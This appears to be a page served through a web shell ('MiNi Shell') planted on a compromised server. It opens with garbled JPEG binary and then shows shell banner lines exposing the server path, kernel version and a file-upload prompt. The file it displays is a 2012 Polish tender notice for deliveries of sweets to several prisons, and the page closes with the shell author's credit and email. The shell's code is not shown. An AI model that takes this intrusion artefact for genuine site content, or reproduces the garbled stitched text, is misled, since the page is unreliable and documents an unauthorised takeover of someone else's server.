JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120924/203929-N-2012.html

<p class="kh_header"><b>Gdańsk: Dostawy słodyczy ZNAK SPRAWY 10/2012/BIGB O/POTULICE</b><br>
<b>Numer ogłoszenia: 203929 - 2012; data zamieszczenia: 24.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bałtycka Instytucja Gospodarki Budżetowej BALTICA , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3231102, faks 58 3231101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bigb-baltica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: IGB.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy słodyczy ZNAK SPRAWY 10/2012/BIGB O/POTULICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Markizy kakaowe Hit Bahlsen 250 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
2. Markizy kakaowe 400 g - 500 g, ilość szacunkowa 4800 sztuk. CPV: 15842300-5.
3. Chałwa waniliowa 80 g - 110 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
4. Chałwa różne smaki 80 g - 110 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
5. Chałwa waniliowa w polewie czekoladowej 50 g - 70 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
6. Cukierki czekoladowe nadziewane - mieszanka E.Wedel paczkowane 210 g - 240 g, ilość szacunkowa 500 sztuk. CPV: 15842200-4.
7. Cukierki czekoladowe nadziewane - mieszanka 210 g - 240 g, ilość szacunkowa 500 sztuk. CPV: 15842200-4.
8. Cukierki Nimm2 90 g, ilość szacunkowa 1100 sztuk. CPV: 15842300-5.
9. Cukierki Werthers orginal 90 g, ilość szacunkowa 1100 sztuk. CPV: 15842300-5.
10. Cukierki Kopiko 120 g, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
11. Landrynki-karmelki twarde miętowe 80 g - 110 g, ilość szacunkowa 4800 sztuk. CPV: 15842300-5.
12. Landrynki-karmelki twarde o smaku owocowym 80 g - 110 g, ilość szacunkowa 4800 sztuk. CPV: 15842300-5.
13. Krówki paczkowane 100 g - 130 g, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
14. Jeżyki Jutrzenka różne smaki 140 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
15. Delicje E.Wedel różne smaki 147 g, ilość szacunkowa 2400 sztuk. CPV: 15842300-5.
16. Pieguski E.Wedel różne smaki 135 g, ilość szacunkowa 1100 sztuk. CPV: 15842300-5.
17. Krakuski florianki 230 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
18. Krakuski serduszka 230 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
19. Krakuski ciastka maślane 200 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
20. Krakuski deserowe z cukrem 200 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
21. Krakuski kokosowe 200 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
22. Biszkopty 120 g - 150 g, ilość szacunkowa 3600 sztuk. CPV: 15842300-5.
23. Biszkopty z galaretką w polewie czekoladowej różne smaki 120 g - 150 g, ilość szacunkowa 7200 sztuk. CPV: 15842300-5.
24. Herbatniki Petit Beurry 100 g, ilość szacunkowa 3200 sztuk. CPV: 15821200-1.
25. Paluszki solone 70 g - 80 g, ilość szacunkowa 3600 sztuk. CPV: 15842300-5.
26. Sękacz kakaowy 30 g - 35 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
27. Ptasie mleczko waniliowe w polewie czekoladowej E.Wedel 420 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
28. Ptasie mleczko waniliowe w polewie czekoladowej 400 g - 450 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
29. Galaretka w czekoladzie różne smaki Jutrzenka 190 g, ilość szacunkowa 400 sztuk. CPV: 15842300-5.
30. Pierniki z nadzieniem paczkowane od 220 g - 240 g różne smaki, ilość szacunkowa 1500 sztuk. CPV: 15842300-5.
31. Pierniki w czekoladzie 400 g - 500 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
32. Toffifee bombonierka 125 g. Orzech laskowy w karmelu, ilość szacunkowa 250 sztuk. CPV: 15842300-5.
33. Chipsy Frito Lay różne smaki 80 g - 100 g, ilość szacunkowa 3200 sztuk. CPV: 15842300-5.
34. Ciastka zbożowe 150 g - 250 g, ilość szacunkowa 700 sztuk. CPV: 15842300-5.
35. Guma do żucia orbit drażetki Pepperm 10 draż. w opakowaniu, ilość szacunkowa 3600 opakowań po 10 draż. CPV: 15842300-5.
36. Guma do żucia orbit drażetki Spearmin 10 draż. w opakowaniu, ilość szacunkowa 3600 opakowań po 10 draż. CPV: 15842300-5.
37. Kakao Puchatek 300 g. CPV: 15841000-5, ilość szacunkowa 700 sztuk.
38. Cukierki czekoladowe Malaga - Wawel luz od 2,0 kg - 2,5 kg, ilość szacunkowa 50 kg. CPV: 15842000-2.
39. Cukierki czekoladowe Tiki-Taki - Wawel luz od 2,0 kg - 2,5 kg, ilość szacunkowa 50 kg. CPV: 15842000-2.
40. Cukierki czekoladowe Kasztanki - Wawel luz od 2,0 kg - 2,5 kg, ilość szacunkowa 50 kg. CPV: 15842000-2.
41. Paluszki serowo-cebulowe 220 g - 250 g, ilość szacunkowa 1000 sztuk, CPV:15842300-5.
42. Lizaki serduszka, ilość szacunkowa 2400 sztuk, CPV 15842300-5.
43. Lizaki Chupa-Chups, ilość szacunkowa 2000 sztuk, CPV 15842300-5.
44. Draże kokosowe, paczkowane opakowanie o wadze od 70 g - 90 g ilość szacunkowa 1000 sztuk, CPV: 15842300-5.
45. Draże kakaowe paczkowane opakowanie o wadze od 70 g - 90 g ilość szacunkowa 1000 sztuk, CPV: 15842300-5.
46. Draże śmietankowe paczkowane opakowanie o wadze od 70 g - 90 g ilość szacunkowa 1000 sztuk, CPV: 15842300-5.
47. Kamyki orzechowe - kruche orzeszki arachidowe oblane kolorowym lukrem, paczkowane opakowanie o wadze 90 g - 100 g, ilość szacunkowa 1000 sztuk. CPV: 15842400-6.
48. BOMBONIERKA Ferrero Raffaello - opakowanie o wadze 150 g, ilość szacunkowa 200 sztuk. CPV: 15842300-5.
49. Rodzynki w czekoladzie o wadze 100 g, ilość szacunkowa 1000 sztuk. CPV: 15332412-5.
50. Drażetki Mentos o wadze 37 g - 43 g, różne smaki, ilość szacunkowa 1000 sztuk. CPV:15842300-5.
51. Drażetki Tic-Tak o wadze 16 g, różne smaki, ilość szacunkowa 1000 sztuk. CPV:15842300-5.
52. Cukierki Raczki o wadze 100 g - 150 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
53. Krakersy o wadze 170 g - 200 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
54. Wafle Knoppers o wadze 25 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
55. Rurki TAGO - opakowania luzowe 3 kg, różne smaki, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
56. Piernik duet TAGO - opakowania luzowe 1,5 kg, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
57. Ciastka kruche z nadzieniem po środku - Słoneczniki TAGO - opakowania luzowe 2 kg, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
58. Ciastka kruche - Śnieżynki TAGO - opakowania luzowe 2 kg, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
59. Jogusie mix PSZCZÓŁKA - opakowanie zbiorcze 3 kg, mieszanka 4 cukierków z nadzieniem mlecznym o smakach: cytrynowym, brzoskwiniowym, malinowym i poziomkowym, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
60. Michałki Piastowskie ODRA - opakowanie 2 kg, cukierki orzechowe oblane czekoladą, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
61. Mieszanka rodzinna MIESZKO - opakowanie zbiorcze 2,5 kg, mieszanka czekoladek i galaretek w czekoladzie deserowej w ośmiu smakach, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
62. Cukierki toffee butter oraz toffee vanilla MIESZKO - opakowanie zbiorcze 3 kg, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
63. lości szacunkowe dostarczanych artykułów mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy.
64. Artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia. Mają być świeże, o dobrym smaku, w zamkniętych i nieuszkodzonych opakowaniach, które posiadają: kod kreskowy oraz nadrukowaną informację o nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia oraz wadze/gramaturze lub ilości j.m. (np. sztuk) w opakowaniu.
65. Termin ważności dostarczanych artykułów - minimum 6 miesięcy, liczony od dnia dostawy. Dostawa artykułów z krótszym terminem ważności może zostać realizowana po uprzednim uzyskaniu zgody od Zamawiającego.
66. Zamawiający dopuszcza możliwość dostaw artykułów w opakowaniu o większej gramaturze lub ilości sztuk w opakowaniu (tzw. promocja) niż określone w siwz w rozdziale III (dotyczy tylko w okresie realizacji zamówienia na podstawie umowy).
67. Dopuszczalne są oferty równoważne, tzn. artykuły o innych nazwach handlowych niż określone przez zamawiającego, pod warunkiem, że będą posiadały parametry, w szczególności dotyczące smaku i aromatu nie gorsze niż artykuły opisane i wymienione przez zamawiającego. Na wykonawcy ciąży udowodnienie, że równoważny artykuł nie jest gorszy od określonego przez zamawiającego. W przypadku oferowania artykułów równoważnych wykonawca do oferty załącza wypełniony załącznik nr 4 do siwz, tj. formularz dotyczący porównania parametrów artykułów.
68. Miejsce, sposób, terminy dostaw oraz forma i termin płatności.
1) Wykonawca dostarczać będzie ww. artykuły na swój koszt, zgodnie z wymogami sanitarnymi w sposób zapobiegający utracie walorów smakowych i odżywczych do magazynów Zamawiającego zlokalizowanych na terenie:
a) Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1;
b) Zakładu Karnego w Bydgoszczy-Fordon, ul. Rynek 8;
c) Aresztu Śledczego w Bydgoszczy, ul. Wały Jagiellońskie 4;
d) Zakładu Karnego w Koronowie, ul. Bydgoska 27;
e) Zakładu Karnego w Czersku, ul. Dworcowa 29;
f) Zakładu Karnego Nr 1 w Grudziądzu, ul. Wybickiego 10/22;
g) Zakładu Karnego Nr 2 w Grudziądzu, ul. Sikorskiego 13/17;
h) Aresztu Śledczego w Inowrocławiu, ul. Gabriela Narutowicza 46 - od 01.01.2013 r.
2) Realizacja dostaw do magazynu w uzgodnionych terminach, w godz. 8:00-12:00.
3) Termin płatności: 30 dni, forma płatności: przelew..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.84.23.00-0, 15.84.23.00-5, 15.84.24.00-6, 15.33.24.12-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie :spełnia lub nie spełnia poszczególne warunki .Zamawiający dokona oceny spełniania poszczególnych warunków udziału w postępowaniu , na podstawie złożonego do oferty oświadczenia , o którym mowa w siwz w rozdziale VIII,tj. podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie :spełnia lub nie spełnia poszczególne warunki .Zamawiający dokona oceny spełniania poszczególnych warunków udziału w postępowaniu , na podstawie złożonego do oferty oświadczenia , o którym mowa w siwz w rozdziale VIII,tj. podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie :spełnia lub nie spełnia poszczególne warunki .Zamawiający dokona oceny spełniania poszczególnych warunków udziału w postępowaniu , na podstawie złożonego do oferty oświadczenia , o którym mowa w siwz w rozdziale VIII,tj. podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bigb-baltica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bigb-baltica.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2012 godzina 12:00, miejsce: BIGB BALTICA O/POTULICE UL.ALEJA PARKOWA 1 ,89-120 POTULICE.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com